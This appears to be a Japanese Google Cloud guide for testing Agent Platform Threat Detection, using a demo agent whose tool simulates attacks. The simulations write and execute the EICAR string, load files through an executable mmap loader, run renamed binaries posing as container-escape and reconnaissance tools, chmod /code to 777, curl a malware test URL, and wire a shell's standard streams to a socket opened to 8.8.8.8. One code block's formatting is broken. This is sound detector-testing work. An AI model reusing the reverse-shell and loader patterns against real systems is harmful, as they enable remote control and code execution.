Agent Platform Threat Detection をテストする

このページでは、検出機能を意図的にトリガーして検出結果をチェックすることで、Agent Platform Threat Detection の動作を確認する方法について説明します。Agent Platform Threat Detection は、Security Command Center の組み込みサービスです。

始める前に

Agent Runtime エージェントに対する潜在的な脅威を検出するには、 Security Command Center で Agent Platform Threat Detection サービスが有効になっていること を確認します。

環境を設定する

Agent Platform Threat Detection をテストするには、悪意のあるアクティビティをシミュレートするデモ エージェントを設定します。

プロジェクトを作成してシェルをアクティブにする

テストに使用する Google Cloud プロジェクトを選択または作成します。

検出機能をテストするには、 Google Cloud コンソールと Cloud Shell を使用します。

  1. コンソールに移動します。Google Cloud

    コンソールに移動 Google Cloud

  2. テストに使用するプロジェクトを選択します。

  3. [Cloud Shell をアクティブにする] をクリックします。

ローカルシェルからテスト手順を実行することもできます。

Agent Runtime を設定する

このプロジェクトで Agent Runtime を使用したことがない場合は、 開始する前に Agent Runtime 環境を設定します。作成した Cloud Storage ステージング バケットの名前を記録します。また、Agent Runtime クイックスタートに沿って、Vertex AI SDK でエージェントを開発 してデプロイする方法を学習することをおすすめします。

テスト スクリプトを作成する

テスト用の新しいエージェントをデプロイするために使用するファイルをいくつか作成します。これには、nano などのテキスト エディタを使用します。

  1. 次の内容で requirements.txt という名前の新しいファイルを作成します。

    google-cloud-aiplatform[agent_engines]
    google-adk
    google-genai
    aiohttp
    cloudpickle
    pydantic
    
  2. installation_scripts/install.sh という名前の新しい空のファイルを作成します。一部のテストでは、このファイルにコンテンツを追加する必要があります。

  3. 次の内容で main.py という名前の新しいファイルを作成します。PROJECT_IDLOCATIONSTAGING_BUCKET 変数を置き換えます。ステージング バケット名には gs:// 接頭辞を含める必要があります。

    import asyncio
    import os
    import subprocess
    import socket
    import vertexai
    from vertexai import Client, agent_engines
    from google.adk.agents import llm_agent
    from google.adk.sessions.in_memory_session_service import InMemorySessionService
    
    # Replace with your own project, location, and staging bucket.
    LOCATION = "LOCATION"
    PROJECT_ID = "PROJECT_ID"
    # Staging bucket must have gs:// prefix
    STAGING_BUCKET = "STAGING_BUCKET"
    
    client = Client(project=PROJECT_ID, location=LOCATION)
    
    def _run_command(args, **kwargs):
      output = f"Called {' '.join(args)}\n"
      try:
        res = subprocess.run(args, capture_output=True, text=True, **kwargs)
        if res.stdout:
          output += f"Result: {res.stdout.strip()}\n"
        if res.stderr:
          output += f"Error: {res.stderr.strip()}\n"
      except subprocess.TimeoutExpired:
        output += "Command timed out as expected."
      return output
    
    # Tool to simulate threats. The function body will be replaced for individual
    # detector tests.
    def threat_detection_test():
      output = _run_command(["sleep", "60"])
      output += _run_command(["echo", "this is a fake threat"])
      output += _run_command(["sleep", "10"])
      return output
    
    root_agent = llm_agent.Agent(
        model="gemini-2.5-flash",
        name="threat_detection_test_agent",
        description="Runs threat detection test.",
        instruction="""
          You are an agent that runs a threat detection test using a fake malicious
          command.
        """,
        tools=[threat_detection_test],
    )
    
    async def main():
      vertexai.init(
        project=PROJECT_ID,
        location=LOCATION,
        staging_bucket=STAGING_BUCKET,
      )
      app = agent_engines.AdkApp(
          agent=root_agent, session_service_builder=InMemorySessionService
      )
      remote_agent = client.agent_engines.create(
          agent=app,
          config={
              "display_name": "scc_threat_test_agent",
              "identity_type": vertexai.types.IdentityType.AGENT_IDENTITY,
              "requirements": [
                  "google-cloud-aiplatform[agent_engines,adk]",
                  "cloudpickle",
                  "pydantic",
              ],
              "staging_bucket": STAGING_BUCKET,
              "extra_packages": [
                  "installation_scripts/install.sh",
              ],
          },
      )
      print("Deployed agent: ", remote_agent.api_resource.name)
    
      try:
          async for event in remote_agent.async_stream_query(
              user_id="threat_detection_tester",
              message="Run the threat detection test",
          ):
            print(event)
      finally:
          client.agent_engines.delete(name=remote_agent.api_resource.name, force=True)
    
    if __name__ == "__main__":
      asyncio.run(main())
    

仮想環境を設定する

  1. Python 仮想環境を作成してアクティブにします。

      python3 -m venv env
      source env/bin/activate
    
  2. 必要な依存関係を仮想環境にインストールします。

    pip install -r requirements.txt
    

スクリプトをテストする

python3 main.py を使用して、仮想環境内からスクリプトを実行します。このコマンドは、テスト エージェントのビルド、デプロイ、実行に数分かかります。

スクリプトは、デプロイされたエージェントのリソース名と、LLM レスポンスやその他のメタデータを含むいくつかの JSON オブジェクトを出力します。この段階で 権限エラーやデプロイ エラーが発生した場合は、 トラブルシューティングで次の 手順を確認してください。

検出機能をテストする

Agent Platform Threat Detection の検出機能をテストするには、threat_detection_test 関数のコードを、攻撃をシミュレートするコードに置き換えます。スクリプトのデプロイとエージェントのクエリに時間がかかることがあります。テストを高速化するには、これらの関数の内容を組み合わせて使用します。

実行: 追加された悪意のあるバイナリの実行

テスト スクリプトの threat_detection_test 関数を置き換えてから、テスト スクリプトを実行します。

def threat_detection_test():
  output = _run_command(["sleep", "60"])
  eicar = r"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
  output += _run_command(["touch", "/tmp/test_mal_file"])
  with open("/tmp/test_mal_file", "w") as f:
    f.write(eicar)
  output += _run_command(["chmod", "700", "/tmp/test_mal_file"])
  output += _run_command(["sh", "-c", "/tmp/test_mal_file"])
  output += _run_command(["sleep", "10"])
  return output

実行: 追加された悪意のあるライブラリの読み込み

テスト スクリプトの threat_detection_test 関数を置き換えてから、テスト スクリプトを実行します。レスポンスの解析に関するエラーが Vertex AI SDK から返されることがありますが、検出結果は生成されます。

def threat_detection_test():
  output = _run_command(["sleep", "60"])
  eicar = r"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
  with open("/tmp/test_mal_lib", "w") as f:
    f.write(eicar)
  with open("/tmp/loader.c", "w") as f:
    f.write("""
      #include <fcntl.h>
      #include <sys/mman.h>
      #include <sys/stat.h>
      #include <unistd.h>
      #include <stdlib.h>
      int main(int argc, char *argv[]) {
         int fd = open(argv[1], O_RDONLY);
         struct stat sb;
         fstat(fd, &sb);
         void* addr = mmap(NULL, sb.st_size, PROT_EXEC, MAP_PRIVATE, fd, 0);
         write(1, addr, sb.st_size);
         munmap(addr, sb.st_size);
         close(fd);
         return 0;
      }
    """)
  output += _run_command(["gcc", "/tmp/loader.c", "-o", "/tmp/loader"])
  output += _run_command(["/tmp/loader", "/tmp/test_mal_lib"])
  output += _run_command(["sleep", "10"])
  return output

実行: コンテナ エスケープ

テスト スクリプトの threat_detection_test 関数を置き換えてから、テスト スクリプトを実行します。

def threat_detection_test():
  output = _run_command(["sleep", "60"])
  output += _run_command(["cp", "/bin/ls", "/tmp/botb-linux-amd64"])
  output += _run_command(["chmod", "700", "/tmp/botb-linux-amd64"])
  output += _run_command(["/tmp/botb-linux-amd64", "-autopwn"])
  output += _run_command(["sleep", "10"])
  return output

実行: Kubernetes 攻撃ツールの実行

テスト スクリプトの threat_detection_test 関数を置き換えてから、テスト スクリプトを実行します。

def threat_detection_test():
  output = _run_command(["sleep", "60"])
  output += _run_command(["cp", "/bin/ls", "/tmp/amicontained"])
  output += _run_command(["/tmp/amicontained"])
  output += _run_command(["sleep", "10"])
  return output

実行: ローカル偵察ツールの実行

テスト スクリプトの threat_detection_test 関数を置き換えてから、テスト スクリプトを実行します。

def threat_detection_test():
  output = _run_command(["sleep", "60"])
  output += _run_command(["cp", "/bin/ls", "/tmp/linenum.sh"])
  output += _run_command(["/tmp/linenum.sh"])
  output += _run_command(["sleep", "10"])
  return output

実行: 変更された悪意のあるバイナリの実行

Replace the `threat_detection_test` function in the test script, and then run the
test script.

```python
def threat_detection_test():
    eicar = r"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
    output = _run_command(["sleep", "60"])
    output += _run_command(["chmod", "-R", "777", "/code"])
    with open("/code/entrypoint.sh", "w") as f:
f.write(eicar)

output += _run_command(["chmod", "700", "/code/entrypoint.sh"]) output += _run_command(["sh", "-c", "/code/entrypoint.sh"]) output += _run_command(["sleep", "10"]) return output ```

実行: 変更された悪意のあるライブラリの読み込み

テスト スクリプトの threat_detection_test 関数を置き換えてから、テスト スクリプトを実行します。

def threat_detection_test():
  eicar = r"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
  output = _run_command(["sleep", "60"])
  output += _run_command(["chmod", "-R", "777", "/code"])
  with open("/code/entrypoint.sh", "w") as f:
    f.write(eicar)
  with open("/tmp/loader.c", "w") as f:
    f.write("""
      #include <fcntl.h>
      #include <sys/mman.h>
      #include <sys/stat.h>
      #include <unistd.h>
      #include <stdlib.h>
      int main(int argc, char *argv[]) {
         int fd = open(argv[1], O_RDONLY);
         struct stat sb;
         fstat(fd, &sb);
         void* addr = mmap(NULL, sb.st_size, PROT_EXEC, MAP_PRIVATE, fd, 0);
         write(1, addr, sb.st_size);
         munmap(addr, sb.st_size);
         close(fd);
         return 0;
      }
    """)
  output += _run_command(["gcc", "/tmp/loader.c", "-o", "/tmp/loader"])
  output += _run_command(["/tmp/loader", "/code/entrypoint.sh"])
  output += _run_command(["sleep", "10"])
  return output

悪意のある URL の観測

installation_scripts/install.sh ファイルを次の内容で更新します。

#!/bin/bash
apt-get install -y curl --no-install-recommends

テスト スクリプトの threat_detection_test 関数を置き換えてから、テスト スクリプトを実行します。

def threat_detection_test():
  url = "https://testsafebrowsing.appspot.com/s/malware.html"
  output = _run_command(["sleep", "60"])
  output += _run_command(["curl", url])
  output += _run_command(["sleep", "10"])
  return output

リバースシェル

テスト スクリプトの threat_detection_test 関数を置き換えてから、テスト スクリプトを実行します。

def threat_detection_test():
  output = _run_command(["sleep", "60"])
  output += _run_command(["cp", "/bin/echo", "/tmp/sh"])
  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  s.connect(("8.8.8.8", 53))
  subprocess.run(["/tmp/sh"], stdin=s, stdout=s, stderr=s, timeout=5)
  output += _run_command(["sleep", "10"])
  return output

次のステップ